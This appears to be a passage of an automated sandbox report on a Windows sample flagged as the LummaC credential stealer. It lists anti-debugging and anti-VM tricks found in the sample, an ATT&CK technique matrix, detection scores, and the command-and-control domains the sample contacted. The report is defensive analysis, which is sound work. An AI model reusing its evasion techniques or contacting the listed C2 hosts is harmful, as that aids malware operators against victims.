    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E82283 second address: E822A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 je 00007F9F2573ED1Ch 0x0000000c jnc 00007F9F2573ED18h 0x00000012 push eax 0x00000013 pushad 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E83C71 second address: E83C89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jmp 00007F9F24D1BA7Ch 0x0000000a pushad 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E83B2A second address: E83B30 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E83B30 second address: E83B3A instructions: 0x00000000 rdtsc 0x00000002 ja 00007F9F24D1BA76h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E85374 second address: E85378 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E87E0E second address: E87E12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E87E12 second address: E87E16 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E87EFB second address: E87F01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E880D8 second address: E88158 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 popad 0x00000008 mov dword ptr [esp], eax 0x0000000b push 00000000h 0x0000000d push ecx 0x0000000e call 00007F9F2573ED18h 0x00000013 pop ecx 0x00000014 mov dword ptr [esp+04h], ecx 0x00000018 add dword ptr [esp+04h], 00000018h 0x00000020 inc ecx 0x00000021 push ecx 0x00000022 ret 0x00000023 pop ecx 0x00000024 ret 0x00000025 mov dword ptr [ebp+122D28D7h], esi 0x0000002b push 00000004h 0x0000002d push 00000000h 0x0000002f push esi 0x00000030 call 00007F9F2573ED18h 0x00000035 pop esi 0x00000036 mov dword ptr [esp+04h], esi 0x0000003a add dword ptr [esp+04h], 0000001Dh 0x00000042 inc esi 0x00000043 push esi 0x00000044 ret 0x00000045 pop esi 0x00000046 ret 0x00000047 mov dh, cl 0x00000049 sbb edx, 47B52AE4h 0x0000004f call 00007F9F2573ED19h 0x00000054 jmp 00007F9F2573ED1Ah 0x00000059 push eax 0x0000005a push eax 0x0000005b push edx 0x0000005c pushad 0x0000005d jo 00007F9F2573ED16h 0x00000063 pushad 0x00000064 popad 0x00000065 popad 0x00000066 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E88158 second address: E88162 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F9F24D1BA7Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E88162 second address: E8818E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a pushad 0x0000000b jmp 00007F9F2573ED28h 0x00000010 pushad 0x00000011 jno 00007F9F2573ED16h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E8818E second address: E881B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov eax, dword ptr [eax] 0x00000008 push eax 0x00000009 push edx 0x0000000a jbe 00007F9F24D1BA8Dh 0x00000010 jmp 00007F9F24D1BA87h 0x00000015 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E881B5 second address: E881BB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E881BB second address: E881BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E88461 second address: E88467 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E88467 second address: E88493 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 nop 0x00000007 mov edx, 11EE6E5Eh 0x0000000c push dword ptr [ebp+122D1E16h] 0x00000012 mov dword ptr [ebp+122D257Ch], edx 0x00000018 mov edx, 0B88F5A0h 0x0000001d push C33E3BAFh 0x00000022 ja 00007F9F24D1BA84h 0x00000028 push eax 0x00000029 push edx 0x0000002a push eax 0x0000002b push edx 0x0000002c rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E88493 second address: E88497 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E8AF16 second address: E8AF3A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 jmp 00007F9F24D1BA85h 0x0000000e popad 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E8AF3A second address: E8AF3E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5210DB6 second address: 5210DDF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, di 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ecx, dword ptr [eax+00000FDCh] 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F9F24D1BA88h 0x00000016 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5210DDF second address: 5210DE5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5210DE5 second address: 5210DE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5210DE9 second address: 5210E7C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9F2573ED1Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b test ecx, ecx 0x0000000d jmp 00007F9F2573ED1Eh 0x00000012 jns 00007F9F2573ED3Dh 0x00000018 jmp 00007F9F2573ED20h 0x0000001d add eax, ecx 0x0000001f pushad 0x00000020 call 00007F9F2573ED1Eh 0x00000025 mov ebx, ecx 0x00000027 pop ecx 0x00000028 mov eax, edi 0x0000002a popad 0x0000002b mov eax, dword ptr [eax+00000860h] 0x00000031 pushad 0x00000032 call 00007F9F2573ED1Fh 0x00000037 mov ecx, 10B3E3AFh 0x0000003c pop ecx 0x0000003d jmp 00007F9F2573ED25h 0x00000042 popad 0x00000043 test eax, eax 0x00000045 push eax 0x00000046 push edx 0x00000047 jmp 00007F9F2573ED1Dh 0x0000004c rdtsc
    Tries to evade debugger and weak emulator (self modifying code)
    Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: BF3854 instructions caused by: Self-modifying code
    Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: BF3942 instructions caused by: Self-modifying code
    Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: DA2835 instructions caused by: Self-modifying code
    Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: E19B17 instructions caused by: Self-modifying code
    Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
    Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
    Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
    Source: C:\Users\user\Desktop\file.exe TID: 5552Thread sleep time: -60000s >= -30000sJump to behavior
    Source: file.exe, file.exe, 00000000.00000002.2148069464.0000000000D71000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
    Source: file.exe, 00000000.00000002.2148574776.00000000015BE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWp
    Source: file.exe, 00000000.00000003.2147642933.0000000001614000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2148574776.0000000001614000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW1
    Source: file.exe, 00000000.00000003.2147642933.0000000001614000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2148574776.0000000001614000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
    Source: file.exe, 00000000.00000002.2148069464.0000000000D71000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
    Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
    Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

    Anti Debugging

    barindex
    Hides threads from debuggers
    Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
    Tries to detect sandboxes and other dynamic analysis tools (window names)
    Source: C:\Users\user\Desktop\file.exeOpen window title or class name: regmonclass
    Source: C:\Users\user\Desktop\file.exeOpen window title or class name: gbdyllo
    Source: C:\Users\user\Desktop\file.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
    Source: C:\Users\user\Desktop\file.exeOpen window title or class name: procmon_window_class
    Source: C:\Users\user\Desktop\file.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
    Source: C:\Users\user\Desktop\file.exeOpen window title or class name: ollydbg
    Source: C:\Users\user\Desktop\file.exeOpen window title or class name: filemonclass
    Source: C:\Users\user\Desktop\file.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
    Source: C:\Users\user\Desktop\file.exeFile opened: NTICE
    Source: C:\Users\user\Desktop\file.exeFile opened: SICE
    Source: C:\Users\user\Desktop\file.exeFile opened: SIWVID
    Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
    Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
    Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BD5BB0 LdrInitializeThunk,0_2_00BD5BB0

    HIPS / PFW / Operating System Protection Evasion

    barindex
    LummaC encrypted strings found
    Source: file.exeString found in binary or memory: licendfilteo.site
    Source: file.exeString found in binary or memory: clearancek.site
    Source: file.exeString found in binary or memory: bathdoomgaz.stor
    Source: file.exeString found in binary or memory: spirittunek.stor
    Source: file.exeString found in binary or memory: dissapoiznw.stor
    Source: file.exeString found in binary or memory: studennotediw.stor
    Source: file.exeString found in binary or memory: mobbipenju.stor
    Source: file.exeString found in binary or memory: eaglepawnoy.stor
    Source: file.exe, file.exe, 00000000.00000002.2148069464.0000000000D71000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Program Manager
    Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

    Stealing of Sensitive Information

    barindex
    Yara detected LummaC Stealer
    Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR

    Remote Access Functionality

    barindex
    Yara detected LummaC Stealer
    Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR

    Mitre Att&ck Matrix

    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
    Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
    Command and Scripting Interpreter    		1
    DLL Side-Loading    		1
    Process Injection    		24
    Virtualization/Sandbox Evasion    		OS Credential Dumping631
    Security Software Discovery    		Remote Services1
    Archive Collected Data    		11
    Encrypted Channel    		Exfiltration Over Other Network MediumAbuse Accessibility Features
    CredentialsDomainsDefault Accounts1
    PowerShell    		Boot or Logon Initialization Scripts1
    DLL Side-Loading    		1
    Process Injection    		LSASS Memory24
    Virtualization/Sandbox Evasion    		Remote Desktop ProtocolData from Removable Media1
    Ingress Tool Transfer    		Exfiltration Over BluetoothNetwork Denial of Service
    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
    Deobfuscate/Decode Files or Information    		Security Account Manager2
    Process Discovery    		SMB/Windows Admin SharesData from Network Shared Drive3
    Non-Application Layer Protocol    		Automated ExfiltrationData Encrypted for Impact
    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook4
    Obfuscated Files or Information    		NTDS23
    System Information Discovery    		Distributed Component Object ModelInput Capture114
    Application Layer Protocol    		Traffic DuplicationData Destruction
    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script12
    Software Packing    		LSA SecretsInternet Connection DiscoverySSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
    DLL Side-Loading    		Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

    Behavior Graph

    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    Screenshots

    Thumbnails

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    SourceDetectionScannerLabelLink
    file.exe54%VirustotalBrowse
    file.exe100%AviraTR/Crypt.ZPACK.Gen
    file.exe100%Joe Sandbox ML

    Dropped Files

    No Antivirus matches

    Unpacked PE Files

    No Antivirus matches

    Domains

    No Antivirus matches

    URLs

    SourceDetectionScannerLabelLink
    https://player.vimeo.com0%URL Reputationsafe
    https://store.steampowered.com/subscriber_agreement/0%URL Reputationsafe
    https://www.gstatic.cn/recaptcha/0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af60%URL Reputationsafe
    http://www.valvesoftware.com/legal.htm0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&amp0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&amp;0%URL Reputationsafe
    https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL0%URL Reputationsafe
    https://steam.tv/0%URL Reputationsafe
    https://steamcommunity.com/profiles/76561199724331900100%URL Reputationmalware
    https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&amp;l=english0%URL Reputationsafe
    http://store.steampowered.com/privacy_agreement/0%URL Reputationsafe
    https://steamcommunity.com:443/profiles/76561199724331900100%URL Reputationmalware
    https://store.steampowered.com/points/shop/0%URL Reputationsafe
    https://lv.queniujq.cn0%URL Reputationsafe
    https://steamcommunity.com/profiles/76561199724331900/inventory/100%URL Reputationmalware
    https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg0%URL Reputationsafe
    https://store.steampowered.com/privacy_agreement/0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=ezWS9te9Zwm9&amp;l=en0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt00%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=REEGJU1hwkYl&am0%URL Reputationsafe
    https://checkout.steampowered.com/0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&amp;l=english0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&amp;l=english0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.png0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&amp;l=englis0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC0%URL Reputationsafe
    https://store.steampowered.com/;0%URL Reputationsafe
    https://store.steampowered.com/about/0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/javascript/global.js?v=9OzcxMXbaV84&amp;l=english0%URL Reputationsafe
    https://help.steampowered.com/en/0%URL Reputationsafe
    https://store.steampowered.com/news/0%URL Reputationsafe
    https://community.akamai.steamstatic.com/0%URL Reputationsafe
    http://store.steampowered.com/subscriber_agreement/0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/css/skin_1/modalContent.css?v=.VpiwkLAYt9r10%URL Reputationsafe
    https://recaptcha.net/recaptcha/;0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&amp;l=en0%URL Reputationsafe
    https://store.steampowered.com/stats/0%URL Reputationsafe
    https://medal.tv0%URL Reputationsafe
    https://broadcast.st.dl.eccdnx.com0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=10%URL Reputationsafe
    https://store.steampowered.com/steam_refunds/0%URL Reputationsafe
    https://login.steampowered.com/0%URL Reputationsafe
    https://store.steampowered.com/legal/0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&amp;l=e0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSv0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&amp;l=engl0%URL Reputationsafe
    https://recaptcha.net0%URL Reputationsafe
    https://store.steampowered.com/0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/images/skin_1/arrowDn9x5.gif0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/shared/images/header/logo_steam.svg?t=9620160%URL Reputationsafe

    Domains and IPs

    Contacted Domains

    NameIPActiveMaliciousAntivirus DetectionReputation
    steamcommunity.com
    		23.192.247.89
    		truetrue
      		unknown
      sergei-esenin.com
      		172.67.206.204
      		truetrue
        		unknown
        eaglepawnoy.store
        		unknown
        		unknowntrue
          		unknown
          bathdoomgaz.store
          		unknown
          		unknowntrue
            		unknown
            spirittunek.store
            		unknown
            		unknowntrue
              		unknown
              licendfilteo.site
              		unknown
              		unknowntrue
                		unknown
                studennotediw.store
                		unknown
                		unknowntrue
                  		unknown
                  mobbipenju.store
                  		unknown
                  		unknowntrue
                    		unknown
                    clearancek.site
                    		unknown
                    		unknowntrue
                      		unknown
                      dissapoiznw.store
                      		unknown
                      		unknowntrue
                        		unknown

                        Contacted URLs

                        NameMaliciousAntivirus DetectionReputation
                        studennotediw.storetrue
                          		unknown
                          dissapoiznw.storetrue
                            		unknown
                            https://steamcommunity.com/profiles/76561199724331900true
                            • URL Reputation: malware
                            		unknown
                            eaglepawnoy.storetrue
                              		unknown
                              bathdoomgaz.storetrue
                                		unknown
                                clearancek.sitetrue
                                  		unknown
                                  spirittunek.storetrue
                                    		unknown
                                    licendfilteo.sitetrue
                                      		unknown

                                      URLs from Memory and Binaries

                                      NameSourceMaliciousAntivirus DetectionReputation
                                      https://player.vimeo.comfile.exe, 00000000.00000003.2137990496.0000000001662000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      https://community.akamai.steamstatic.com/public/shared/javascript/auth_refresh.js?v=WgUxSlKTb3W1&ampfile.exe, 00000000.00000003.2137923043.0000000001672000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2137923043.0000000001678000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2147609286.0000000001682000.00000004.00000020.00020000.00000000.sdmpfalse
                                        		unknown
                                        https://steamcommunity.com/?subsection=broadcastsfile.exe, 00000000.00000003.2137923043.0000000001678000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2147609286.0000000001682000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		unknown
                                          https://store.steampowered.com/;Persisfile.exe, 00000000.00000003.2147642933.0000000001614000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2148574776.0000000001614000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		unknown
                                            https://sergei-esenin.com/file.exe, 00000000.00000003.2147642933.0000000001614000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2148574776.0000000001614000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		unknown
                                              https://store.steampowered.com/subscriber_agreement/file.exe, 00000000.00000003.2137923043.0000000001678000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2147609286.0000000001682000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              https://www.gstatic.cn/recaptcha/file.exe, 00000000.00000003.2137990496.0000000001662000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6file.exe, 00000000.00000003.2147642933.0000000001614000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2137923043.0000000001672000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2137923043.0000000001678000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2148574776.0000000001614000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2147609286.0000000001682000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              http://www.valvesoftware.com/legal.htmfile.exe, 00000000.00000003.2137923043.0000000001678000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2147609286.0000000001682000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              https://www.youtube.comfile.exe, 00000000.00000003.2137990496.0000000001662000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		unknown
                                                https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&ampfile.exe, 00000000.00000003.2137923043.0000000001672000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2137923043.0000000001678000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2147609286.0000000001682000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.pngfile.exe, 00000000.00000003.2137923043.0000000001678000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2147609286.0000000001682000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                https://www.google.comfile.exe, 00000000.00000003.2147642933.0000000001614000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2137990496.0000000001662000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2148574776.0000000001614000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		unknown
                                                  https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.pngfile.exe, 00000000.00000003.2137923043.0000000001678000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2147609286.0000000001682000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&amp;file.exe, 00000000.00000003.2137923043.0000000001672000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2137923043.0000000001678000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2147609286.0000000001682000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedbackfile.exe, 00000000.00000003.2137923043.0000000001678000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2147609286.0000000001682000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tLfile.exe, 00000000.00000003.2137923043.0000000001672000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2137923043.0000000001678000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2147609286.0000000001682000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  https://s.ytimg.com;file.exe, 00000000.00000003.2137990496.0000000001662000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		unknown
                                                    https://steam.tv/file.exe, 00000000.00000003.2147642933.0000000001614000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2137990496.0000000001662000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2148574776.0000000001614000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    https://licendfilteo.site:443/apifile.exe, 00000000.00000002.2148574776.00000000015FE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2147642933.00000000015FE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      		unknown
                                                      https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&amp;l=englishfile.exe, 00000000.00000003.2137923043.0000000001672000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2137923043.0000000001678000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2147609286.0000000001682000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      http://store.steampowered.com/privacy_agreement/file.exe, 00000000.00000002.2148763674.000000000168A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2147642933.0000000001614000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2137923043.0000000001672000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2137923043.0000000001678000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2148574776.0000000001614000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2147609286.0000000001682000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      		unknown
